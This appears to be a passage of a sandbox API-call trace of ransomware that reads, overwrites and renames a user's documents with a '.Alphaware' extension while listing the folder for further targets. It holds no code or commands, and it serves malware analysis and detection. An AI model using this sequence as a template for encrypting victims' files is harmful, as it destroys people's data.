lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ZiOJla1 Q-SXSl2W5.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ziojla1 q-sxsl2w5.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23d2300 | out: lpFileInformation=0x23d2300*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfa0a610, ftCreationTime.dwHighDateTime=0x1d96d2e, ftLastAccessTime.dwLowDateTime=0x40b60b60, ftLastAccessTime.dwHighDateTime=0x1d973fe, ftLastWriteTime.dwLowDateTime=0x40b60b60, ftLastWriteTime.dwHighDateTime=0x1d973fe, nFileSizeHigh=0x0, nFileSizeLow=0x10145)) returned 1 [0083.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.842] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ZiOJla1 Q-SXSl2W5.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ziojla1 q-sxsl2w5.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.843] GetFileType (hFile=0x254) returned 0x1 [0083.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.843] GetFileType (hFile=0x254) returned 0x1 [0083.843] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x10145 [0083.843] ReadFile (in: hFile=0x254, lpBuffer=0x23d2578, nNumberOfBytesToRead=0x10145, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23d2578*, lpNumberOfBytesRead=0x23eb38*=0x10145, lpOverlapped=0x0) returned 1 [0083.845] CloseHandle (hObject=0x254) returned 1 [0083.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.871] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ZiOJla1 Q-SXSl2W5.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ziojla1 q-sxsl2w5.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.873] GetFileType (hFile=0x254) returned 0x1 [0083.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.873] GetFileType (hFile=0x254) returned 0x1 [0083.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.876] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ZiOJla1 Q-SXSl2W5.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ziojla1 q-sxsl2w5.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa0a610, ftCreationTime.dwHighDateTime=0x1d96d2e, ftLastAccessTime.dwLowDateTime=0x40b60b60, ftLastAccessTime.dwHighDateTime=0x1d973fe, ftLastWriteTime.dwLowDateTime=0x84312140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x157e0)) returned 1 [0083.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.877] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\ZiOJla1 Q-SXSl2W5.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\ziojla1 q-sxsl2w5.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\ZiOJla1 Q-SXSl2W5.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\ziojla1 q-sxsl2w5.xlsx.alphaware")) returned 1 [0083.877] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx", dwFileAttributes=0x80) returned 1 [0083.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.878] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\_aoxubo 1xfzs.docx"), fInfoLevelId=0x0, lpFileInformation=0x2495370 | out: lpFileInformation=0x2495370*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7cb78090, ftCreationTime.dwHighDateTime=0x1d96683, ftLastAccessTime.dwLowDateTime=0xbe0a3d60, ftLastAccessTime.dwHighDateTime=0x1d968e2, ftLastWriteTime.dwLowDateTime=0xbe0a3d60, ftLastWriteTime.dwHighDateTime=0x1d968e2, nFileSizeHigh=0x0, nFileSizeLow=0xd298)) returned 1 [0083.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.878] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\_aoxubo 1xfzs.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.878] GetFileType (hFile=0x254) returned 0x1 [0083.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.879] GetFileType (hFile=0x254) returned 0x1 [0083.879] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xd298 [0083.879] ReadFile (in: hFile=0x254, lpBuffer=0x24955c8, nNumberOfBytesToRead=0xd298, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24955c8*, lpNumberOfBytesRead=0x23eb38*=0xd298, lpOverlapped=0x0) returned 1 [0083.880] CloseHandle (hObject=0x254) returned 1 [0083.908] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx", lpFilePart=0x0) returned 0x2f [0083.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.908] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\_aoxubo 1xfzs.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.910] GetFileType (hFile=0x254) returned 0x1 [0083.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.910] GetFileType (hFile=0x254) returned 0x1 [0083.910] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.911] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.912] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.912] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.912] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.913] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.913] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.913] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.914] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.914] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.914] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.915] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.915] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.915] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.916] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.916] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.916] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.916] WriteFile (in: hFile=0x254, lpBuffer=0x2405900*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2405900*, lpNumberOfBytesWritten=0x23e9f8*=0x9a0, lpOverlapped=0x0) returned 1 [0083.917] CloseHandle (hObject=0x254) returned 1 [0083.919] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx", lpFilePart=0x0) returned 0x2f [0083.919] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx.Alphaware", lpFilePart=0x0) returned 0x39 [0083.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.919] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\_aoxubo 1xfzs.docx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb78090, ftCreationTime.dwHighDateTime=0x1d96683, ftLastAccessTime.dwLowDateTime=0xbe0a3d60, ftLastAccessTime.dwHighDateTime=0x1d968e2, ftLastWriteTime.dwLowDateTime=0x84384560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x119a0)) returned 1 [0083.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.919] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\_aoxubo 1xfzs.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\_aOXubo 1XFZS.docx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\_aoxubo 1xfzs.docx.alphaware")) returned 1 [0083.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0083.920] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x23e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0083.921] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x84384560, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x84384560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a2b0 [0083.921] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x84384560, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x84384560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.921] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac959be0, ftCreationTime.dwHighDateTime=0x1d91ba5, ftLastAccessTime.dwLowDateTime=0xcaa74f80, ftLastAccessTime.dwHighDateTime=0x1d95b64, ftLastWriteTime.dwLowDateTime=0x8315dda0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcbc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="-mBHtuQ4.docx.Alphaware", cAlternateFileName="-MBHTU~1.ALP")) returned 1 [0083.921] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a3b930, ftCreationTime.dwHighDateTime=0x1d96bc8, ftLastAccessTime.dwLowDateTime=0xea143ce0, ftLastAccessTime.dwHighDateTime=0x1d96eae, ftLastWriteTime.dwLowDateTime=0x8328e8a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6034, dwReserved0=0x0, dwReserved1=0x0, cFileName="1dc7CK 8O2M4jV0-v99j.doc.Alphaware", cAlternateFileName="1DC7CK~1.ALP")) returned 1 [0083.921] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde85d950, ftCreationTime.dwHighDateTime=0x1d9653b, ftLastAccessTime.dwLowDateTime=0x9314d360, ftLastAccessTime.dwHighDateTime=0x1d96da4, ftLastWriteTime.dwLowDateTime=0x8334cf80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe134, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Ahm.xlsx.Alphaware", cAlternateFileName="2AHMXL~1.ALP")) returned 1 [0083.921] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63bc3f80, ftCreationTime.dwHighDateTime=0x1d96ad5, ftLastAccessTime.dwLowDateTime=0xc3b83e00, ftLastAccessTime.dwHighDateTime=0x1d96d16, ftLastWriteTime.dwLowDateTime=0x833bf3a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ffe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4A87C_8NPb.pps.Alphaware", cAlternateFileName="4A87C_~1.ALP")) returned 1 [0083.921] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1bd690, ftCreationTime.dwHighDateTime=0x1d8edc7, ftLastAccessTime.dwLowDateTime=0xd4054800, ftLastAccessTime.dwHighDateTime=0x1d8f559, ftLastWriteTime.dwLowDateTime=0x834efea0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15574, dwReserved0=0x0, dwReserved1=0x0, cFileName="ac gZ.docx.Alphaware", cAlternateFileName="ACGZDO~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd35bd9c0, ftCreationTime.dwHighDateTime=0x1d96c17, ftLastAccessTime.dwLowDateTime=0xa07fed10, ftLastAccessTime.dwHighDateTime=0x1d975e1, ftLastWriteTime.dwLowDateTime=0xa07fed10, ftLastWriteTime.dwHighDateTime=0x1d975e1, nFileSizeHigh=0x0, nFileSizeLow=0x17271, dwReserved0=0x0, dwReserved1=0x0, cFileName="CH482b9Cr-K.ots", cAlternateFileName="CH482B~1.OTS")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a0c280, ftCreationTime.dwHighDateTime=0x1d93459, ftLastAccessTime.dwLowDateTime=0x62984420, ftLastAccessTime.dwHighDateTime=0x1d9621d, ftLastWriteTime.dwLowDateTime=0x835d46e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14220, dwReserved0=0x0, dwReserved1=0x0, cFileName="Daw-ipdR7oVXj2G.docx.Alphaware", cAlternateFileName="DAW-IP~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x836209a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5d0bb50, ftCreationTime.dwHighDateTime=0x1d974f9, ftLastAccessTime.dwLowDateTime=0x47ebbca0, ftLastAccessTime.dwHighDateTime=0x1d975f1, ftLastWriteTime.dwLowDateTime=0x47ebbca0, ftLastWriteTime.dwHighDateTime=0x1d975f1, nFileSizeHigh=0x0, nFileSizeLow=0x178ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="DITJBeUAzHRJy.ots", cAlternateFileName="DITJBE~1.OTS")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5b92770, ftCreationTime.dwHighDateTime=0x1d9437d, ftLastAccessTime.dwLowDateTime=0xf4886af0, ftLastAccessTime.dwHighDateTime=0x1d975bd, ftLastWriteTime.dwLowDateTime=0x836df080, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x152c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="dNMC XdC2fS1.pptx.Alphaware", cAlternateFileName="DNMCXD~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a94d90, ftCreationTime.dwHighDateTime=0x1d967f1, ftLastAccessTime.dwLowDateTime=0xc7558580, ftLastAccessTime.dwHighDateTime=0x1d96993, ftLastWriteTime.dwLowDateTime=0x8379d760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xeab4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZ5O.docx.Alphaware", cAlternateFileName="DZ5ODO~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e51dc40, ftCreationTime.dwHighDateTime=0x1d969f0, ftLastAccessTime.dwLowDateTime=0x15d1dce0, ftLastAccessTime.dwHighDateTime=0x1d97385, ftLastWriteTime.dwLowDateTime=0x83835ce0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xa1f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="D_cm4s7fP.pptx.Alphaware", cAlternateFileName="D_CM4S~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x503ed6f0, ftCreationTime.dwHighDateTime=0x1d943fe, ftLastAccessTime.dwLowDateTime=0x64756d00, ftLastAccessTime.dwHighDateTime=0x1d9701d, ftLastWriteTime.dwLowDateTime=0x838ce260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12688, dwReserved0=0x0, dwReserved1=0x0, cFileName="gerLGhJ-J1Fq.xlsx.Alphaware", cAlternateFileName="GERLGH~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89b600, ftCreationTime.dwHighDateTime=0x1d97469, ftLastAccessTime.dwLowDateTime=0x8884feb0, ftLastAccessTime.dwHighDateTime=0x1d97485, ftLastWriteTime.dwLowDateTime=0x83a71180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8e60, dwReserved0=0x0, dwReserved1=0x0, cFileName="GwoFAC.pdf.Alphaware", cAlternateFileName="GWOFAC~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d85d70, ftCreationTime.dwHighDateTime=0x1d96dec, ftLastAccessTime.dwLowDateTime=0x9c877e90, ftLastAccessTime.dwHighDateTime=0x1d96ee2, ftLastWriteTime.dwLowDateTime=0x83b09700, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4f34, dwReserved0=0x0, dwReserved1=0x0, cFileName="hoG8.xlsx.Alphaware", cAlternateFileName="HOG8XL~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec285530, ftCreationTime.dwHighDateTime=0x1d916dd, ftLastAccessTime.dwLowDateTime=0x3c2aff40, ftLastAccessTime.dwHighDateTime=0x1d9405c, ftLastWriteTime.dwLowDateTime=0x83ba1c80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12d74, dwReserved0=0x0, dwReserved1=0x0, cFileName="hTjop.xlsx.Alphaware", cAlternateFileName="HTJOPX~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0e03c0, ftCreationTime.dwHighDateTime=0x1d95d6e, ftLastAccessTime.dwLowDateTime=0x32233aa0, ftLastAccessTime.dwHighDateTime=0x1d95ec8, ftLastWriteTime.dwLowDateTime=0x83bedf40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10960, dwReserved0=0x0, dwReserved1=0x0, cFileName="i5YIwk0.pptx.Alphaware", cAlternateFileName="I5YIWK~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d178af0, ftCreationTime.dwHighDateTime=0x1d96de9, ftLastAccessTime.dwLowDateTime=0xe846b4c0, ftLastAccessTime.dwHighDateTime=0x1d9715f, ftLastWriteTime.dwLowDateTime=0x83c3a200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe134, dwReserved0=0x0, dwReserved1=0x0, cFileName="J8xwAYmu3o.xls.Alphaware", cAlternateFileName="J8XWAY~1.ALP")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6dfc50, ftCreationTime.dwHighDateTime=0x1d970b9, ftLastAccessTime.dwLowDateTime=0x895d6900, ftLastAccessTime.dwHighDateTime=0x1d97564, ftLastWriteTime.dwLowDateTime=0x895d6900, ftLastWriteTime.dwHighDateTime=0x1d97564, nFileSizeHigh=0x0, nFileSizeLow=0x30f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MKqMrJd2GayW Iyftd.ots", cAlternateFileName="MKQMRJ~1.OTS")) returned 1 [0083.922] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", 